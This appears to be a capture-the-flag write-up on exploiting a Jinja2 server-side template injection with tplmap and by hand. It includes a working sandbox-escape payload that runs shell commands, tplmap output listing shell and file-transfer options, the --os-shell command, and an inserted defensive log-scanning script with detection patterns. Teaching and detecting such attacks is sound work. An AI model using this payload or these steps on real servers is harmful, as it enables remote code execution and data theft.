A simple tplmap usage case
Tplmap introduction
Tplmap is a Python tool that finds code injection and server-side template injection (SSTI) vulnerabilities using sandbox escape techniques. It can exploit SSTI in many template engines to reach the target's files or operating system. Supported template engines include PHP (code evaluation), Ruby (code evaluation), JavaScript (code evaluation), Python (code evaluation), ERB, Jinja2 and Tornado. The tool can perform blind injection against these template engines and is able to execute remote commands.
tplmap installation steps
Open a terminal in Kali and enter
git clone https://github.com/epinna/tplmap
For the details of git clone, see my earlier blog post
That is the whole installation process; next we take a challenge as a usage case
We reproduce it on BUUCTF, with the challenge [BJDCTF 2nd]fake google
Case: [BJDCTF 2nd]fake google
Method one: manual injection
This challenge can be injected manually; the payload is given directly here
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}
The template injection statement is explained as follows
- {% for c in [].__class__.__base__.__subclasses__() %} // iterate over the subclasses reachable from list
- {% if c.__name__=='catch_warnings' %} // check for the target class
- {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}} // assemble the call
- {% endif %}{% endfor %} // close the if and the for loop
Method two: tplmap
Using the tplmap tool
Open a terminal in the tplmap folder
Type the command; -u specifies the URL
./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1
Below is the output
root@kali:~/tplmap# ./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1
[+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun tplmap providing one of the following options:
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
We can see the engine is Jinja2, and at the bottom it also tells us that --os-shell can be used to get a shell
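From the defender's side, the probe tags tplmap printed above ({{*}} for Jinja2/Tornado, ${*} for Mako, {% ... %} statements) and the attribute chain in the manual payload (__class__, __subclasses__, __globals__) are exactly what shows up in the web server's access log when a parameter such as name is being tested. The following script is an added example, not code from the post or from the tplmap project: it decodes each query parameter of the request lines in a few constructed access-log entries and reports which SSTI indicators they match. The log lines, IPs, paths and indicator names are all assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Template delimiters used as probe tags by the engines listed in the tplmap output.
TEMPLATE_DELIMITERS = [
    ("jinja2/tornado expression", re.compile(r"\{\{.*?\}\}", re.S)),
    ("jinja2 statement", re.compile(r"\{%.*?%\}", re.S)),
    ("mako expression", re.compile(r"\$\{.*?\}", re.S)),
]

# Python attribute names that the sandbox-escape payload walks through.
SANDBOX_ESCAPE_TOKENS = [
    "__class__", "__subclasses__", "__globals__", "__builtins__", "__import__", "popen",
]

# Constructed sample log lines (Apache combined-style); not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /qaq?name=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /qaq?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /qaq?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /search?q=hello+world HTTP/1.1" 200 128',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def score_value(value):
    """Return the indicator names matched by one decoded parameter value."""
    hits = []
    for name, pattern in TEMPLATE_DELIMITERS:
        if pattern.search(value):
            hits.append(name)
    for token in SANDBOX_ESCAPE_TOKENS:
        if token in value:
            hits.append("escape-chain:" + token)
    return hits


def scan_url(url):
    """Decode every query parameter of a URL and report the SSTI indicators it matches."""
    findings = []
    for key, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl already decodes one layer of percent-encoding; decode once more
        # so a double-encoded probe is inspected in its final form.
        value = unquote_plus(raw)
        hits = score_value(value)
        if hits:
            findings.append({"param": key, "value": value, "indicators": hits})
    return findings


def scan_access_log(lines):
    """Extract the request target from each log line and scan its query string."""
    findings = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        for finding in scan_url(match.group(1)):
            finding["source"] = line.split(" ", 1)[0]  # client address field
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["source"], f["param"], f["indicators"])
```

The two probe lines are flagged while the plain "name=1" and "q=hello world" requests are not. In practice the delimiter patterns alone produce some noise on applications that legitimately accept braces, so the escape-chain tokens are the higher-confidence signal; a sudden burst of both from one client against one parameter is the pattern to alert on.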
./tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1 --engine=Jinja2 --os-shell
After entering the URL, don't forget to specify the template engine with --engine
Run ls ../ to look at the directory; there is a flag, so cat /flag does it
Got it!